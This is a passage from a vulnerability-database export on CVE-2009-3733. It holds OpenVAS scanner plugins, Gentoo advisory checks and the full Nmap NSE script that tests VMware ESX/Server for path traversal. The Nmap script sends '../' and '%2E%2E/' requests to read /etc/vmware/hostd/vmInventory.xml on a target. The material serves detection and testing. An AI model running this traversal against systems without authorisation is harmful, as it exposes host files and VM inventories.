(http://fyrmassociates.com/tools.html).\n\n\nSYNTAX:\n\nhttp.pipeline: If set, it represents the number of HTTP requests that'll be\npipelined (ie, sent in a single request). 
This can be set low to make\ndebugging easier, or it can be set high to test how a server reacts (its\nchosen max is ignored).\n\n\nhttp.useragent: The value of the User-Agent header field sent with\nrequests. By default it is\n''Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)''.\nA value of the empty string disables sending the User-Agent header field.\n\n\n\nhttp-max-cache-size: The maximum memory size (in bytes) of the cache.", "modified": "2017-03-07T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:104150", "href": "http://plugins.openvas.org/nasl.php?oid=104150", "type": "openvas", "title": "Nmap NSE net: http-vmware-path-vuln", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap_http_vmware_path_vuln_net.nasl 5505 2017-03-07 10:00:18Z teissa $\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: Ron Bowes\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).\n\nThe vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at\nShmoocon 2010 (http://fyrmassociates.com/tools.html).\n\n\nSYNTAX:\n\nhttp.pipeline: If set, it represents the number of HTTP requests that'll be\npipelined (ie, sent in a single request). This can be set low to make\ndebugging easier, or it can be set high to test how a server reacts (its\nchosen max is ignored).\n\n\nhttp.useragent: The value of the User-Agent header field sent with\nrequests. By default it is\n''Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)''.\nA value of the empty string disables sending the User-Agent header field.\n\n\n\nhttp-max-cache-size: The maximum memory size (in bytes) of the cache.\";\n\nif(description)\n{\n script_id(104150);\n script_version(\"$Revision: 5505 $\");\n script_cve_id(\"CVE-2001-1013\");\n script_bugtraq_id(3335);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-07 11:00:18 +0100 (Tue, 07 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Nmap NSE net: http-vmware-path-vuln\");\n\n\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n 
script_dependencies(\"nmap_nse_net.nasl\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse_net\");\n\n script_add_preference(name:\"http.pipeline\", value:\"\", type:\"entry\");\n script_add_preference(name:\"http.useragent\", value:\"\", type:\"entry\");\n script_add_preference(name:\"http-max-cache-size\", value:\"\", type:\"entry\");\n\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"nmap.inc\");\n\n\nphase = 0;\nif (defined_func(\"scan_phase\")) {\n phase = scan_phase();\n}\n\nif (phase == 1) {\n # Get the preferences\n argv = make_array();\n\n pref = script_get_preference(\"http.pipeline\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"http.pipeline\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"http.useragent\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"http.useragent\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"http-max-cache-size\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"http-max-cache-size\"] = string('\"', pref, '\"');\n }\n nmap_nse_register(script:\"http-vmware-path-vuln\", args:argv);\n} else if (phase == 2) {\n res = nmap_nse_get_results(script:\"http-vmware-path-vuln\");\n foreach portspec (keys(res)) {\n output_banner = 'Result found by Nmap Security Scanner (http-vmware-path-vuln.nse) http://nmap.org:\\n\\n';\n if (portspec == \"0\") {\n security_message(data:output_banner + res[portspec], port:0);\n } else {\n v = split(portspec, sep:\"/\", keep:0);\n proto = v[0];\n port = v[1];\n security_message(data:output_banner + res[portspec], port:port, protocol:proto);\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-07-21T19:26:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1013", "CVE-2009-3733"], "description": "Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).\n\nThe vulnerability was originally released by Justin Morehouse and 
Tony Flick, who presented at\nShmoocon 2010 (see reference).\n\nSYNTAX:\n\nhttp.pipeline: If set, it represents the number of HTTP requests that", "modified": "2020-07-07T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:1361412562310104150", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310104150", "type": "openvas", "title": "Nmap NSE net: http-vmware-path-vuln", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: Ron Bowes\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.104150\");\n script_version(\"2020-07-07T14:13:50+0000\");\n script_cve_id(\"CVE-2001-1013\");\n script_bugtraq_id(3335);\n script_tag(name:\"last_modification\", value:\"2020-07-07 14:13:50 +0000 (Tue, 07 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Nmap NSE net: http-vmware-path-vuln\");\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2011 NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n\n script_xref(name:\"URL\", value:\"http://fyrmassociates.com/tools.html\");\n\n script_tag(name:\"summary\", value:\"Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).\n\nThe vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at\nShmoocon 2010 (see reference).\n\nSYNTAX:\n\nhttp.pipeline: If set, it represents the number of HTTP requests that'll be\npipelined (ie, sent in a single request). 
This can be set low to make\ndebugging easier, or it can be set high to test how a server reacts (its\nchosen max is ignored).\n\nhttp-max-cache-size: The maximum memory size (in bytes) of the cache.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-24T12:51:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0967", "CVE-2008-2101", "CVE-2007-5503", "CVE-2008-4915", "CVE-2009-3707", "CVE-2008-2098", "CVE-2008-1361", "CVE-2008-4916", "CVE-2008-1447", "CVE-2008-1392", "CVE-2009-3732", "CVE-2008-1808", "CVE-2010-1137", "CVE-2009-0040", "CVE-2007-5269", "CVE-2010-1139", "CVE-2010-1142", "CVE-2008-1364", "CVE-2009-2267", "CVE-2008-2100", "CVE-2009-0910", "CVE-2010-1138", "CVE-2010-1143", "CVE-2010-1140", "CVE-2009-1244", "CVE-2011-3868", "CVE-2008-1363", "CVE-2007-5671", "CVE-2008-1340", "CVE-2009-3733", "CVE-2008-4917", "CVE-2008-1807", "CVE-2009-0909", "CVE-2009-4811", "CVE-2008-1362", "CVE-2008-1806", "CVE-2010-1141"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201209-25.", "modified": "2017-07-07T00:00:00", "published": "2012-10-03T00:00:00", "id": "OPENVAS:72459", "href": "http://plugins.openvas.org/nasl.php?oid=72459", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201209-25 (vmware-server vmware-player vmware-workstation)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been found in VMware Player, Server,\nand Workstation, allowing remote and local attackers to conduct several\nattacks, including privilege escalation, remote execution of arbitrary\ncode, and a Denial of Service.\";\ntag_solution = \"Gentoo discontinued support for VMware Player. We recommend that users\nunmerge VMware Player:\n\n # emerge --unmerge 'app-emulation/vmware-player'\n \n\nNOTE: Users could upgrade to >=app-emulation/vmware-player-3.1.5,\nhowever these packages are not currently stable.\n\nGentoo discontinued support for VMware Workstation. We recommend that\nusers unmerge VMware Workstation:\n\n # emerge --unmerge 'app-emulation/vmware-workstation'\n \n\nNOTE: Users could upgrade to >=app-emulation/vmware-workstation-7.1.5,\nhowever these packages are not currently stable.\n\nGentoo discontinued support for VMware Server. 
We recommend that users\n unmerge VMware Server:\n\n # emerge --unmerge 'app-emulation/vmware-server'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201209-25\nhttp://bugs.gentoo.org/show_bug.cgi?id=213548\nhttp://bugs.gentoo.org/show_bug.cgi?id=224637\nhttp://bugs.gentoo.org/show_bug.cgi?id=236167\nhttp://bugs.gentoo.org/show_bug.cgi?id=245941\nhttp://bugs.gentoo.org/show_bug.cgi?id=265139\nhttp://bugs.gentoo.org/show_bug.cgi?id=282213\nhttp://bugs.gentoo.org/show_bug.cgi?id=297367\nhttp://bugs.gentoo.org/show_bug.cgi?id=335866\nhttp://bugs.gentoo.org/show_bug.cgi?id=385727\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201209-25.\";\n\n \n \nif(description)\n{\n script_id(72459);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2007-5269\", \"CVE-2007-5503\", \"CVE-2007-5671\", \"CVE-2008-0967\", \"CVE-2008-1340\", \"CVE-2008-1361\", \"CVE-2008-1362\", \"CVE-2008-1363\", \"CVE-2008-1364\", \"CVE-2008-1392\", \"CVE-2008-1447\", \"CVE-2008-1806\", \"CVE-2008-1807\", \"CVE-2008-1808\", \"CVE-2008-2098\", \"CVE-2008-2100\", \"CVE-2008-2101\", \"CVE-2008-4915\", \"CVE-2008-4916\", \"CVE-2008-4917\", \"CVE-2009-0040\", \"CVE-2009-0909\", \"CVE-2009-0910\", \"CVE-2009-1244\", \"CVE-2009-2267\", \"CVE-2009-3707\", \"CVE-2009-3732\", \"CVE-2009-3733\", \"CVE-2009-4811\", \"CVE-2010-1137\", \"CVE-2010-1138\", \"CVE-2010-1139\", \"CVE-2010-1140\", \"CVE-2010-1141\", \"CVE-2010-1142\", \"CVE-2010-1143\", \"CVE-2011-3868\");\n script_version(\"$Revision: 6593 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:18:14 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-10-03 11:11:29 -0400 (Wed, 03 Oct 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201209-25 (vmware-server vmware-player vmware-workstation)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n 
script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"app-emulation/vmware-player\", unaffected: make_list(), vulnerable: make_list(\"le 2.5.5.328052\"))) != NULL ) {\n report += res;\n}\nif((res = ispkgvuln(pkg:\"app-emulation/vmware-workstation\", unaffected: make_list(), vulnerable: make_list(\"le 6.5.5.328052\"))) != NULL ) {\n report += res;\n}\nif((res = ispkgvuln(pkg:\"app-emulation/vmware-server\", unaffected: make_list(), vulnerable: make_list(\"le 1.0.9.156507\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0967", "CVE-2008-2101", "CVE-2007-5503", "CVE-2008-4915", "CVE-2009-3707", "CVE-2008-2098", "CVE-2008-1361", "CVE-2008-4916", "CVE-2008-1447", "CVE-2008-1392", "CVE-2009-3732", "CVE-2008-1808", "CVE-2010-1137", "CVE-2009-0040", "CVE-2007-5269", "CVE-2010-1139", "CVE-2010-1142", "CVE-2008-1364", "CVE-2009-2267", "CVE-2008-2100", "CVE-2009-0910", "CVE-2010-1138", "CVE-2010-1143", "CVE-2010-1140", "CVE-2009-1244", "CVE-2011-3868", "CVE-2008-1363", "CVE-2007-5671", "CVE-2008-1340", "CVE-2009-3733", "CVE-2008-4917", "CVE-2008-1807", "CVE-2009-0909", 
"CVE-2009-4811", "CVE-2008-1362", "CVE-2008-1806", "CVE-2010-1141"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201209-25.", "modified": "2018-10-12T00:00:00", "published": "2012-10-03T00:00:00", "id": "OPENVAS:136141256231072459", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231072459", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201209-25 (vmware-server vmware-player vmware-workstation)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201209_25.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.72459\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2007-5269\", \"CVE-2007-5503\", \"CVE-2007-5671\", \"CVE-2008-0967\", \"CVE-2008-1340\", \"CVE-2008-1361\", \"CVE-2008-1362\", \"CVE-2008-1363\", \"CVE-2008-1364\", \"CVE-2008-1392\", \"CVE-2008-1447\", \"CVE-2008-1806\", \"CVE-2008-1807\", \"CVE-2008-1808\", \"CVE-2008-2098\", \"CVE-2008-2100\", \"CVE-2008-2101\", \"CVE-2008-4915\", \"CVE-2008-4916\", \"CVE-2008-4917\", \"CVE-2009-0040\", \"CVE-2009-0909\", \"CVE-2009-0910\", \"CVE-2009-1244\", \"CVE-2009-2267\", \"CVE-2009-3707\", \"CVE-2009-3732\", \"CVE-2009-3733\", \"CVE-2009-4811\", \"CVE-2010-1137\", \"CVE-2010-1138\", \"CVE-2010-1139\", \"CVE-2010-1140\", \"CVE-2010-1141\", \"CVE-2010-1142\", \"CVE-2010-1143\", \"CVE-2011-3868\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-10-03 11:11:29 -0400 (Wed, 03 Oct 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201209-25 (vmware-server vmware-player vmware-workstation)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been found in VMware Player, Server,\nand Workstation, allowing remote and local attackers to conduct several\nattacks, including privilege escalation, remote execution of arbitrary\ncode, and a Denial of Service.\");\n script_tag(name:\"solution\", value:\"Gentoo discontinued support for VMware Player. We recommend that users\nunmerge VMware Player:\n\n # emerge --unmerge 'app-emulation/vmware-player'\n\n\nNOTE: Users could upgrade to >=app-emulation/vmware-player-3.1.5,\nhowever these packages are not currently stable.\n\nGentoo discontinued support for VMware Workstation. We recommend that\nusers unmerge VMware Workstation:\n\n # emerge --unmerge 'app-emulation/vmware-workstation'\n\n\nNOTE: Users could upgrade to >=app-emulation/vmware-workstation-7.1.5,\nhowever these packages are not currently stable.\n\nGentoo discontinued support for VMware Server. 
We recommend that users\n unmerge VMware Server:\n\n # emerge --unmerge 'app-emulation/vmware-server'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201209-25\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=213548\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=224637\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=236167\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=245941\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=265139\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=282213\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=297367\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=335866\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=385727\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201209-25.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"app-emulation/vmware-player\", unaffected: make_list(), vulnerable: make_list(\"le 2.5.5.328052\"))) != NULL ) {\n report += res;\n}\nif((res = ispkgvuln(pkg:\"app-emulation/vmware-workstation\", unaffected: make_list(), vulnerable: make_list(\"le 6.5.5.328052\"))) != NULL ) {\n report += res;\n}\nif((res = ispkgvuln(pkg:\"app-emulation/vmware-server\", unaffected: make_list(), vulnerable: make_list(\"le 1.0.9.156507\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nmap": 
[{"lastseen": "2019-05-30T17:05:23", "description": "Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733). \n\nThe vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at Shmoocon 2010 (http://fyrmassociates.com/tools.html).\n\n## Script Arguments \n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n## Example Usage \n \n \n nmap --script http-vmware-path-vuln -p80,443,8222,8333 <host>\n \n\n## Script Output \n \n \n | http-vmware-path-vuln:\n | VMWare path traversal (CVE-2009-3733): VULNERABLE\n | /vmware/Windows 2003/Windows 2003.vmx\n | /vmware/Pentest/Pentest - Linux/Linux Pentest Bravo.vmx\n | /vmware/Pentest/Pentest - Windows/Windows 2003.vmx\n | /mnt/vmware/vmware/FreeBSD 7.2/FreeBSD 7.2.vmx\n | /mnt/vmware/vmware/FreeBSD 8.0/FreeBSD 8.0.vmx\n | /mnt/vmware/vmware/FreeBSD 8.0 64-bit/FreeBSD 8.0 64-bit.vmx\n |_ /mnt/vmware/vmware/Slackware 13 32-bit/Slackware 13 32-bit.vmx\n \n\n## Requires \n\n * http\n * nmap\n * shortport\n * stdnse\n * string\n * table\n\n* * *\n", "edition": 8, "published": "2010-02-16T14:42:10", "title": "http-vmware-path-vuln NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3733"], "modified": "2015-11-05T20:41:05", "id": "NMAP:HTTP-VMWARE-PATH-VULN.NSE", "href": "https://nmap.org/nsedoc/scripts/http-vmware-path-vuln.html", "sourceData": "local http = require \"http\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nChecks for a path-traversal vulnerability in VMWare 
ESX, ESXi, and Server (CVE-2009-3733).\n\nThe vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at Shmoocon 2010 (http://fyrmassociates.com/tools.html).\n]]\n\n---\n-- @usage\n-- nmap --script http-vmware-path-vuln -p80,443,8222,8333 <host>\n--\n-- @output\n-- | http-vmware-path-vuln:\n-- | VMWare path traversal (CVE-2009-3733): VULNERABLE\n-- | /vmware/Windows 2003/Windows 2003.vmx\n-- | /vmware/Pentest/Pentest - Linux/Linux Pentest Bravo.vmx\n-- | /vmware/Pentest/Pentest - Windows/Windows 2003.vmx\n-- | /mnt/vmware/vmware/FreeBSD 7.2/FreeBSD 7.2.vmx\n-- | /mnt/vmware/vmware/FreeBSD 8.0/FreeBSD 8.0.vmx\n-- | /mnt/vmware/vmware/FreeBSD 8.0 64-bit/FreeBSD 8.0 64-bit.vmx\n-- |_ /mnt/vmware/vmware/Slackware 13 32-bit/Slackware 13 32-bit.vmx\n-----------------------------------------------------------------------\n\nauthor = \"Ron Bowes\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\n\nportrule = shortport.port_or_service({80, 443, 8222,8333}, {\"http\", \"https\"})\n\nlocal function get_file(host, port, path)\n local file\n\n -- Replace spaces in the path with %20\n path = string.gsub(path, \" \", \"%%20\")\n\n -- Try both ../ and %2E%2E/\n file = \"/sdk/../../../../../../\" .. path\n\n local result = http.get( host, port, file)\n if(result['status'] ~= 200 or result['content-length'] == 0) then\n file = \"/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/\" .. path\n result = http.get( host, port, file)\n\n if(result['status'] ~= 200 or result['content-length'] == 0) then\n return false, \"Couldn't download file: \" .. 
path\n end\n end\n\n return true, result.body, file\nend\n\nlocal function fake_xml_parse(str, tag)\n local result = {}\n local index, tag_start, tag_end\n\n -- Lowercase the 'body' we're searching\n local lc = string.lower(str)\n -- Lowercase the tag\n tag = string.lower(tag)\n\n -- This loop does some ugly pattern-based xml parsing\n index, tag_start = string.find(lc, \"<\" .. tag .. \">\")\n while index do\n tag_end, index = string.find(lc, \"</\" .. tag .. \">\", index)\n table.insert(result, string.sub(str, tag_start + 1, tag_end - 1)) -- note: not lowercase\n index, tag_start = string.find(lc, \"<\" .. tag .. \">\", index)\n end\n\n return result\nend\n\n--local function parse_vmware_conf(str, field)\n-- local index, value_start = string.find(str, field .. \"[^\\\"]*\")\n-- if(not(index) or not(value_start)) then\n-- return nil\n-- end\n--\n-- local value_end = string.find(str, \"\\\"\", value_start + 1)\n-- if(not(value_end)) then\n-- return nil\n-- end\n--\n-- return string.sub(str, value_start + 1, value_end - 1)\n--end\n\nlocal function go(host, port)\n local result, body\n local files\n\n -- Try to download the file\n result, body = get_file(host, port, \"/etc/vmware/hostd/vmInventory.xml\");\n -- It failed -- probably not vulnerable\n if(not(result)) then\n return false, \"Couldn't download file: \" .. 
body\n end\n\n -- Check if the file contains the proper XML\n if(string.find(string.lower(body), \"configroot\") == nil) then\n return false, \"Server didn't return XML -- likely not vulnerable.\"\n end\n\n files = fake_xml_parse(body, \"vmxcfgpath\")\n\n if(#files == 0) then\n return true, {\"No VMs appear to be installed\"}\n end\n\n -- Process each of the .vmx files if verbosity is on\n --if(nmap.verbosity() > 1) then\n -- local result, file = get_file(host, port, files[1])\n -- io.write(nsedebug.tostr(file))\n --end\n\n return true, files\nend\n\naction = function(host, port)\n -- Try a standard ../ path\n local status, result = go(host, port)\n\n if(not(status)) then\n return nil\n end\n\n local response = {}\n table.insert(response, \"VMWare path traversal (CVE-2009-3733): VULNERABLE\")\n\n if(nmap.verbosity() > 1) then\n table.insert(response, result)\n end\n\n return stdnse.format_output(true, response)\nend\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "d2": [{"lastseen": "2019-05-29T17:19:06", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3733"], "description": "**Name**| d2sec_vmware_dirtrav \n---|--- \n**CVE**| CVE-2009-3733 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| VmWare Server Directory Traversal \n**Notes**| \n", "edition": 2, "modified": "2009-11-02T15:30:00", "published": "2009-11-02T15:30:00", "id": "D2SEC_VMWARE_DIRTRAV", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_vmware_dirtrav", "title": "DSquare Exploit Pack: D2SEC_VMWARE_DIRTRAV", "type": "d2", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T17:19:07", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3733"], "description": "**Name**| d2sec_vmware \n---|--- \n**CVE**| CVE-2009-3733 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| VmWare Server Directory Traversal \n**Notes**| 
